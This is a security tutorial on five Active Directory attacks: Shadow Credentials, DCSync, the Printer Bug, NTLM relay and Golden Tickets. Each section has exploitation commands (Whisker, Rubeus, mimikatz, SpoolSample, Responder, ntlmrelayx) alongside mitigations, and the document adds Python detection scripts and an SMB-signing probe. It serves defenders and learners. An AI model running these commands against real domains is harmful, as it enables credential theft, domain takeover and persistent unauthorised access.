Active Directory Advanced Concepts
1️⃣ 🏴☠️ Shadow Credentials Attack (Abusing Key Trust)
✅ What is it?
Windows Hello for Business (WHfB) key trust stores a public key in the account's msDS-KeyCredentialLink attribute; a DC holding a PKINIT-capable certificate then accepts certificate-based Kerberos authentication from whoever owns the matching private key.
An attacker who can write that attribute on a target account (GenericWrite/GenericAll/WriteProperty on the object, or membership in Key Admins) adds their own key pair and authenticates as the victim without resetting the password, so the account keeps working and nothing alerts the user.
✅ How to exploit? 📌 First record which accounts already carry a key credential (the baseline of what is normal); the real precondition is write access on the target object's msDS-KeyCredentialLink, so check the target's ACL for GenericWrite/GenericAll/WriteProperty held by a principal you control:
```powershell
Get-ADUser -Filter * -Properties msDS-KeyCredentialLink |
  Where-Object { $_.'msDS-KeyCredentialLink' } |
  Select-Object SamAccountName
```
📌 Generate a key pair plus self-signed certificate and write it into the target's msDS-KeyCredentialLink in one step with Whisker (it needs a Windows Server 2016+ schema and at least one DC with a certificate that allows PKINIT, for example from AD CS):
```powershell
Whisker.exe add /target:victim /domain:<DOMAIN> /dc:<DC_FQDN>
```
📌 Whisker prints the matching Rubeus command. Use the certificate it produced to obtain a TGT for the victim via PKINIT and, through U2U, the victim's NTLM hash:
```powershell
Rubeus.exe asktgt /user:victim /certificate:<base64_pfx> /password:<pfx_password> /domain:<DOMAIN> /dc:<DC_FQDN> /getcredentials /show /nowrap
```
💀 The attacker now acts as "victim" without a password reset. 🚀 Clean up afterwards with Whisker's remove action (pass the DeviceID shown by its list action) so that a legitimate WHfB key on the account is not wiped.
✅ Mitigation:
Restrict who can write msDS-KeyCredentialLink: audit the ACLs of privileged accounts for GenericWrite/GenericAll/WriteProperty held by non-admins, and keep Key Admins and Enterprise Key Admins empty unless WHfB is actually deployed.
Enable "Audit Directory Service Changes" with a SACL covering the attribute, then analyse Event ID 5136 where AttributeLDAPDisplayName is msDS-KeyCredentialLink and the subject is not the account itself (self-enrolment by a user, or by COMPUTER$ on its own object, is normal WHfB behaviour).
On the DCs, Event ID 4768 carrying certificate information for an account that normally logs on with a password is the second signal.
2️⃣ 🏴☠️ Domain Replication Attack (DCSync Attack)
✅ What is it?
DCSync abuses the directory replication protocol (MS-DRSR, DRSGetNCChanges): the attacker pretends to be a Domain Controller and asks a real DC to replicate account secrets, so NTLM hashes and Kerberos keys come straight from the DC without touching LSASS or NTDS.dit.
It requires a principal holding "Replicating Directory Changes" and "Replicating Directory Changes All" on the domain naming context, which by default means Domain Admins, Enterprise Admins, Administrators and the DC computer accounts. At that level it is the standard way to pull the krbtgt hash and keep full persistence.
✅ How to exploit? 📌 Replication rights are ACEs on the domain object, not a user attribute, so check the domain ACL for the replication control-access-right GUIDs (1131f6aa-... is DS-Replication-Get-Changes, 1131f6ad-... is DS-Replication-Get-Changes-All) with the ActiveDirectory module loaded:
```powershell
Import-Module ActiveDirectory
(Get-Acl "AD:\$((Get-ADDomain).DistinguishedName)").Access | Where-Object { $_.AccessControlType -eq 'Allow' -and $_.ObjectType -in '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2','1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' } | Select-Object IdentityReference, ObjectType
```
📌 Once the attacker holds a DA-level account (or any principal with both replication rights), run DCSync:
```powershell
mimikatz.exe lsadump::dcsync /domain:<DOMAIN> /user:krbtgt
```
🔥 Boom! This returns the krbtgt NTLM hash and AES keys, which is everything a Golden Ticket needs. Impacket's secretsdump.py does the same from Linux. Every DCSync produces a 4662 on the DC that answered, so the attack is loud if anyone is looking.
✅ Mitigation:
Keep replication rights on the domain object limited to the DC computer accounts and the built-in admin groups; review every extra grant (Azure AD Connect's MSOL_ account legitimately needs it, so allowlist it explicitly rather than ignoring it).
Monitor Event ID 4662 on the DCs for the replication GUIDs (1131f6aa-..., 1131f6ad-..., 89e95b76-...) in the Properties field where the subject is not a DC; this needs "Audit Directory Service Access" enabled. Event ID 4742 (computer account changed) is not a DCSync indicator; it matters for DCShadow-style fake DC registration.
Rotate the krbtgt password on a regular schedule (twice, with replication time in between).
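Detection logic for the two monitoring recommendations, as an added example that is not part of the original page: it applies the Event ID 5136 check from section 1 (msDS-KeyCredentialLink written by someone other than the account itself) and the Event ID 4662 check from this section (replication GUIDs used by a non-DC subject) to a handful of event records. The XML is constructed to mirror the Security log schema as Get-WinEvent's .ToXml() returns it; the account names (attacker, victim, WS01$, DC01$, DC02$, MSOL_a1b2c3) and the replication allowlist are invented for the demo. On a real DC, feed it the strings from `Get-WinEvent -LogName Security | ForEach-Object { $_.ToXml() }`.

```python
import xml.etree.ElementTree as ET

# Control-access-right GUIDs that DRSGetNCChanges (DCSync) exercises; a 4662
# lists the ones used in its Properties field.
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
# Principals that legitimately replicate: DC machine accounts plus the Azure AD
# Connect service account. Assumed names for this demo; build yours from
# Get-ADDomainController and your sync-account inventory.
REPL_ALLOWLIST = {"DC01$", "DC02$", "MSOL_a1b2c3"}
# OperationType codes logged by 5136.
OP_TYPES = {"%%14674": "added", "%%14675": "removed"}


def event_fields(xml_text):
    """Return (EventID, {Data Name: value}) from one Security event's XML."""
    root = ET.fromstring(xml_text)
    tag = lambda el: el.tag.rsplit("}", 1)[-1]  # strip the Windows event namespace if present
    return (int(next(el.text for el in root.iter() if tag(el) == "EventID")),
            {el.get("Name"): (el.text or "").strip() for el in root.iter() if tag(el) == "Data"})


def detect_shadow_credential_write(data):
    """5136: msDS-KeyCredentialLink changed by a subject other than the account itself.

    Legitimate WHfB enrolment is written by the account on its own object (user on
    user, COMPUTER$ on computer), so subject != target is the signal. The compare
    assumes the object's CN equals its sAMAccountName; for users whose CN is a
    display name, resolve the DN to sAMAccountName before comparing.
    """
    if data.get("AttributeLDAPDisplayName", "").lower() != "msds-keycredentiallink":
        return None
    target_dn = data.get("ObjectDN", "")
    target = target_dn.split(",", 1)[0].removeprefix("CN=")
    subject = data.get("SubjectUserName", "")
    if subject.rstrip("$").lower() == target.lower():
        return None  # self-enrolment
    op = OP_TYPES.get(data.get("OperationType"), "changed")
    return f"SHADOW-CREDS: {subject} {op} key credential on {target_dn}"


def detect_dcsync(data):
    """4662: replication control-access rights exercised by a non-DC subject."""
    props = data.get("Properties", "").lower()
    used = sorted(g for g in REPL_GUIDS if g in props)
    if not used:
        return None
    subject = data.get("SubjectUserName", "")
    if subject in REPL_ALLOWLIST:
        return None
    return f"DCSYNC: {subject} replicated {data.get('ObjectName', '?')} using {', '.join(used)}"


def triage(events):
    """Run both detections over a list of event XML strings; return alert lines."""
    alerts = []
    for xml_text in events:
        event_id, data = event_fields(xml_text)
        finding = None
        if event_id == 5136:
            finding = detect_shadow_credential_write(data)
        elif event_id == 4662:
            finding = detect_dcsync(data)
        if finding:
            alerts.append(finding)
    return alerts


# Constructed sample records (real field names, no namespace, invented principals).
SAMPLE_EVENTS = [
    # attacker writes a key credential onto victim's user object (what Whisker add does)
    """<Event><System><EventID>5136</EventID></System><EventData>
         <Data Name="SubjectUserName">attacker</Data>
         <Data Name="ObjectDN">CN=victim,CN=Users,DC=corp,DC=local</Data>
         <Data Name="AttributeLDAPDisplayName">msDS-KeyCredentialLink</Data>
         <Data Name="OperationType">%%14674</Data></EventData></Event>""",
    # WS01$ enrolling its own WHfB key: benign
    """<Event><System><EventID>5136</EventID></System><EventData>
         <Data Name="SubjectUserName">WS01$</Data>
         <Data Name="ObjectDN">CN=WS01,CN=Computers,DC=corp,DC=local</Data>
         <Data Name="AttributeLDAPDisplayName">msDS-KeyCredentialLink</Data>
         <Data Name="OperationType">%%14674</Data></EventData></Event>""",
    # DC02$ replicating from DC01: benign
    """<Event><System><EventID>4662</EventID></System><EventData>
         <Data Name="SubjectUserName">DC02$</Data>
         <Data Name="ObjectName">DC=corp,DC=local</Data>
         <Data Name="Properties">%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}</Data></EventData></Event>""",
    # attacker running lsadump::dcsync
    """<Event><System><EventID>4662</EventID></System><EventData>
         <Data Name="SubjectUserName">attacker</Data>
         <Data Name="ObjectName">DC=corp,DC=local</Data>
         <Data Name="Properties">%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}</Data></EventData></Event>""",
]

if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print(line)
```

The allowlist is the part that needs care in production: every DC computer account and every legitimate sync account must be in it, otherwise normal replication floods the alert, and anything not in it that touches those GUIDs deserves a ticket.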
3️⃣ 🏴☠️ Printer Bug Attack (MS-RPRN Abuse)
✅ What is it?
The Print Spooler's MS-RPRN RPC interface lets any authenticated domain user call RpcRemoteFindFirstPrinterChangeNotificationEx against a remote machine, which makes that machine (running as SYSTEM, so authenticating as its computer account such as DC01$) connect to a host the caller chooses. The "printer bug" is therefore an authentication coercion primitive, not an exploit that hands out SYSTEM by itself: the coerced authentication is then relayed (NTLM relay) or captured on a host with unconstrained delegation (which yields the machine's TGT).
It is long-standing, by-design behaviour that Microsoft does not patch. The PrintNightmare family (CVE-2021-1675, CVE-2021-34527) is a different Spooler bug, a remote code execution / local privilege escalation through driver installation, and is patched.
✅ How to exploit? 📌 Check whether the Spooler is reachable on the target. Locally, sc qc Spooler shows the service configuration; remotely, the \pipe\spoolss named pipe is only present while the service listens:
```powershell
sc qc Spooler
Test-Path "\\victim-PC\pipe\spoolss"
```
📌 Trigger the coercion with SpoolSample (or printerbug.py from krbrelayx on Linux): victim-PC will authenticate to attacker-host:
```powershell
SpoolSample.exe victim-PC attacker-host
```
🔥 What arrives is the victim's machine-account authentication. If attacker-host has unconstrained delegation and Rubeus monitor is running, the victim's TGT lands in memory (a DC's TGT means DCSync); otherwise hand the NTLM authentication to ntlmrelayx, for example relayed to LDAP to configure resource-based constrained delegation, which ends in SYSTEM on victim-PC.
✅ Mitigation:
Disable the Print Spooler service wherever printing is not needed (stop it and prevent it from starting again):
```powershell
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
```
Domain Controllers must always have the Print Spooler disabled. Where it cannot be disabled, enforce SMB and LDAP signing and remove unconstrained delegation so that the coerced authentication is worthless to the attacker.
4️⃣ 🏴☠️ NTLM Relay Attack (No Password Required!)
✅ What is it?
NTLM's challenge-response does not bind the authentication to the server the client believes it is talking to. An attacker in the middle forwards the client's NEGOTIATE, CHALLENGE and AUTHENTICATE messages to a different service and ends up authenticated there as the victim, without ever knowing or cracking the password.
It works against any service that accepts NTLM and does not enforce signing or channel binding: SMB (signing not required), LDAP/LDAPS (no signing or no channel binding) and HTTP endpoints (MSSQL, AD CS web enrollment and the like). Relaying back to the host the authentication came from has been blocked since MS08-068.
✅ How to exploit? 📌 Poison LLMNR/NBT-NS/WPAD name lookups with Responder so that clients authenticate to the attacker. For relaying (rather than capturing hashes to crack), first set SMB = Off and HTTP = Off in Responder.conf, otherwise Responder answers those connections itself and ntlmrelayx never sees them:
```bash
responder -I eth0 -wrf
```
📌 Relay the incoming NTLM authentication to hosts that do not require SMB signing (target.txt holds one host per line; crackmapexec/netexec --gen-relay-list builds that list for you):
```bash
ntlmrelayx.py -tf target.txt -smb2support
```
🔥 When a relayed user is a local admin on the target, ntlmrelayx dumps the SAM by default; with -c it runs a command instead, and with -socks it keeps the authenticated session open for later use. No credentials were ever needed.
✅ Mitigation:
Require SMB signing on servers and clients. The workstation default is "enabled, not required", which does not stop relay; only "required" does.
Enforce LDAP signing and LDAPS channel binding on the Domain Controllers; the LDAP relay target is where RBCD, replication-right grants and Shadow Credentials get written.
Disable LLMNR, NBT-NS and WPAD so that Responder has nothing to poison, and do not give domain users unnecessary local admin rights, since a relayed authentication is only worth what the victim can do on the target.
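A way to turn the first mitigation into a check, as an added example that is not from the original page: the SecurityMode field of an SMB2 NEGOTIATE response states whether the server merely supports signing (bit 0x01, the workstation and member-server default, so relayable) or requires it (bit 0x02, the Domain Controller default, so not relayable). The block builds a real NEGOTIATE request (probe() sends it to port 445 when you have network access) and parses the reply; the two responses in SAMPLE_RESPONSES are constructed to look like a default workstation and a default DC, and the host names are invented.

```python
import socket
import struct
import uuid

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_HEADER_LEN = 64
SIGNING_ENABLED = 0x0001   # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002  # SMB2_NEGOTIATE_SIGNING_REQUIRED
HEADER_FMT = "<4sHHIHHIIQIIQ16s"  # MS-SMB2 2.2.1 sync header, 64 bytes


def build_negotiate_request(dialects=(0x0202, 0x0210)):
    """SMB2 NEGOTIATE request (MS-SMB2 2.2.3) offering SMB 2.0.2 and 2.1 only, so
    the reply carries no negotiate contexts and the fixed-layout parse below holds."""
    header = struct.pack(HEADER_FMT,
                         SMB2_MAGIC, SMB2_HEADER_LEN, 0,  # ProtocolId, StructureSize, CreditCharge
                         0,                               # Status / ChannelSequence
                         SMB2_NEGOTIATE, 1,               # Command, CreditRequest
                         0, 0,                            # Flags, NextCommand
                         0,                               # MessageId
                         0, 0,                            # Reserved, TreeId
                         0,                               # SessionId
                         b"\x00" * 16)                    # Signature
    body = struct.pack("<HHHHI16sQ",
                       36, len(dialects),                 # StructureSize (always 36), DialectCount
                       SIGNING_ENABLED, 0,                # SecurityMode (we can sign), Reserved
                       0, uuid.uuid4().bytes,             # Capabilities, ClientGuid
                       0)                                 # ClientStartTime
    return header + body + struct.pack("<%dH" % len(dialects), *dialects)


def parse_negotiate_response(msg):
    """Return (dialect, security_mode) from a raw SMB2 NEGOTIATE response
    (NetBIOS length prefix already removed)."""
    if len(msg) < SMB2_HEADER_LEN + 6 or msg[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    status, = struct.unpack_from("<I", msg, 8)
    command, = struct.unpack_from("<H", msg, 12)
    if command != SMB2_NEGOTIATE or status != 0:
        raise ValueError(f"unexpected command {command:#x} / status {status:#x}")
    structure_size, security_mode, dialect = struct.unpack_from("<HHH", msg, SMB2_HEADER_LEN)
    if structure_size != 65:  # MS-SMB2 2.2.4: fixed value for the NEGOTIATE response
        raise ValueError("not a NEGOTIATE response body")
    return dialect, security_mode


def is_relayable(security_mode):
    """NTLM relay to SMB works unless the server insists on signing."""
    return not security_mode & SIGNING_REQUIRED


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed mid-message")
        buf += chunk
    return buf


def probe(host, port=445, timeout=5):
    """Live check: send NEGOTIATE to host, return (dialect, security_mode, relayable)."""
    req = build_negotiate_request()
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"\x00" + len(req).to_bytes(3, "big") + req)  # NetBIOS session header
        length = int.from_bytes(_recv_exact(s, 4)[1:], "big")
        msg = _recv_exact(s, length)
    dialect, mode = parse_negotiate_response(msg)
    return dialect, mode, is_relayable(mode)


def _fake_negotiate_response(security_mode, dialect=0x0210):
    """Constructed server reply for the offline demo; same layout as MS-SMB2 2.2.4."""
    header = struct.pack(HEADER_FMT, SMB2_MAGIC, SMB2_HEADER_LEN, 0, 0, SMB2_NEGOTIATE, 1,
                         0x00000001, 0, 0, 0, 0, 0, b"\x00" * 16)  # Flags: SERVER_TO_REDIR
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, dialect, 0, uuid.uuid4().bytes,
                       0, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0)
    return header + body


SAMPLE_RESPONSES = {  # constructed replies, invented host names
    "ws01.corp.local": _fake_negotiate_response(SIGNING_ENABLED),
    "dc01.corp.local": _fake_negotiate_response(SIGNING_ENABLED | SIGNING_REQUIRED),
}


def scan_samples(responses=SAMPLE_RESPONSES):
    """Map host -> relayable, the same decision --gen-relay-list makes."""
    return {host: is_relayable(parse_negotiate_response(msg)[1]) for host, msg in responses.items()}


if __name__ == "__main__":
    for host, relayable in scan_samples().items():
        print(f"{host}: {'RELAY TARGET' if relayable else 'signing required'}")
```

Run probe() against your own hosts before and after pushing the "Microsoft network server: Digitally sign communications (always)" policy; the workstation reply should flip from 0x1 to 0x3.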
5️⃣ 🏴☠️ Golden Ticket Attack (Permanent Domain Persistence)
✅ What is it?
A TGT is a blob encrypted with the krbtgt account's key. Whoever holds that key (NTLM hash or AES key) can forge TGTs offline for any account, with any group SIDs in the PAC and any lifetime (mimikatz defaults to 10 years), and the DCs accept them because they decrypt and validate.
That is persistence that survives the password change of every account except krbtgt: the forged ticket stays valid until krbtgt has been rotated twice. One caveat: for a TGT older than 20 minutes the KDC re-checks that the account exists and is enabled, so forge for an account that will still be there (RID 500 Administrator is the usual choice). 😈
✅ How to exploit? 📌 Get the krbtgt key with DCSync (see the previous attack):
```powershell
mimikatz.exe lsadump::dcsync /domain:<DOMAIN> /user:krbtgt
```
📌 Forge the ticket and inject it into the current session (/sid is the domain SID, not the user's; /ptt passes the ticket straight into memory):
```powershell
mimikatz.exe kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_NTLM_HASH> /user:Administrator /ptt
```
🔥 Boom! A "forever-valid" TGT carrying Domain Admins membership in its PAC, usable against any service in the domain. In an AES-only domain prefer /aes256:<KRBTGT_AES_KEY> over /krbtgt:, because an RC4 (0x17) ticket stands out as an encryption-type anomaly in Event ID 4769.
✅ Mitigation:
Rotate the krbtgt password every 90 days and immediately after any suspected compromise; reset it twice with replication time in between, because the KDC also honours the previous key and a single reset does not invalidate existing Golden Tickets.
Monitor Event IDs 4769 and 4672 in the SIEM for service tickets with an unusual encryption type, ticket options or lifetime, and for privileged logons by accounts that never received a 4768 TGT from any DC.
Apply strict Kerberos policy (short TGT lifetime, AES only, Protected Users for admin accounts) and treat a DC-level compromise as a full reset scenario, krbtgt included.
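The 4768/4769 correlation the monitoring advice points at, as an added example that is not from the original page. It applies two weak signals to a window of Kerberos events collected from all DCs: a TGS request (4769) for an account that no DC issued a TGT (4768) to inside the window (a forged TGT never went through AS-REQ), and a service ticket encryption type of 0x17 (RC4-HMAC) in a domain that otherwise issues 0x12 (AES256), which is what forging with /krbtgt:<NTLM hash> produces. Both have known false positives: a TGT issued before the window, renewals (logged as 4770), and legacy systems still on RC4. The events are constructed, and the account, host and realm names (alice, bob, Administrator, FS01, DC01, CORP.LOCAL) are invented.

```python
import xml.etree.ElementTree as ET

RC4_HMAC = 0x17
AES256 = 0x12


def event_fields(xml_text):
    """Return (EventID, {Data Name: value}) from one Security event's XML."""
    root = ET.fromstring(xml_text)
    tag = lambda el: el.tag.rsplit("}", 1)[-1]  # tolerate the Windows event namespace
    return (int(next(el.text for el in root.iter() if tag(el) == "EventID")),
            {el.get("Name"): (el.text or "").strip() for el in root.iter() if tag(el) == "Data"})


def _account(data):
    """4769 logs 'user@REALM', 4768 logs 'user'; normalise both to lowercase 'user'."""
    return data.get("TargetUserName", "").split("@")[0].lower()


def hunt_golden_tickets(events, domain_etype=AES256):
    """Return [(account, service, client_ip, [reasons])] for suspicious 4769 records.

    events: XML strings of 4768 and 4769 records from every DC, covering at least
    the maximum TGT lifetime (10 h by default) before the TGS requests of interest.
    """
    tgt_issued = set()
    tgs_requests = []
    for xml_text in events:
        event_id, data = event_fields(xml_text)
        if event_id == 4768 and data.get("Status") == "0x0":
            tgt_issued.add(_account(data))
        elif event_id == 4769 and data.get("Status") == "0x0":
            tgs_requests.append(data)
    findings = []
    for data in tgs_requests:
        reasons = []
        if _account(data) not in tgt_issued:
            reasons.append("TGS request without any 4768 for this account in the window")
        etype = int(data.get("TicketEncryptionType", "0x0"), 16)
        if etype == RC4_HMAC and domain_etype != RC4_HMAC:
            reasons.append("RC4-HMAC (0x17) service ticket in a domain that issues AES")
        if reasons:
            findings.append((_account(data), data.get("ServiceName", "?"),
                             data.get("IpAddress", "?"), reasons))
    return findings


def _event(event_id, **fields):
    """Build a constructed event record with the given EventData names (demo only)."""
    data = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return f"<Event><System><EventID>{event_id}</EventID></System><EventData>{data}</EventData></Event>"


# Constructed log slice with invented names and addresses.
SAMPLE_EVENTS = [
    # alice logs on normally: AS-REQ on a DC, then a service ticket for FS01
    _event(4768, TargetUserName="alice", TicketEncryptionType="0x12", Status="0x0", IpAddress="::ffff:10.0.0.5"),
    _event(4769, TargetUserName="alice@CORP.LOCAL", ServiceName="FS01$", TicketEncryptionType="0x12", Status="0x0", IpAddress="::ffff:10.0.0.5"),
    # Golden Ticket forged with /krbtgt:<NTLM>: no 4768 anywhere, RC4 ticket, straight at the DC
    _event(4769, TargetUserName="Administrator@CORP.LOCAL", ServiceName="DC01$", TicketEncryptionType="0x17", Status="0x0", IpAddress="::ffff:10.0.0.66"),
    # bob: AES ticket but no 4768 in the window; may be a TGT older than the window, so investigate
    _event(4769, TargetUserName="bob@CORP.LOCAL", ServiceName="FS01$", TicketEncryptionType="0x12", Status="0x0", IpAddress="::ffff:10.0.0.7"),
]

if __name__ == "__main__":
    for account, service, ip, reasons in hunt_golden_tickets(SAMPLE_EVENTS):
        print(f"{account} -> {service} from {ip}: " + "; ".join(reasons))
```

The "no 4768" signal only means something when the window really spans the TGT lifetime and the collection really covers every DC; a missing log source turns every user of that DC into a false positive, so check coverage before acting on a single hit.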
🔥 Final Thoughts
😈 If you are learning real-world AD exploitation, these advanced techniques matter. ✅ DCSync and Golden Ticket attacks are dangerous because they give domain-wide persistence. ✅ NTLM relay and the Printer Bug turn a low-privileged user into SYSTEM on a target, or into domain compromise when a DC is coerced. ✅ RBCD (not covered above) and Shadow Credentials are stealthy, powerful privilege-escalation techniques.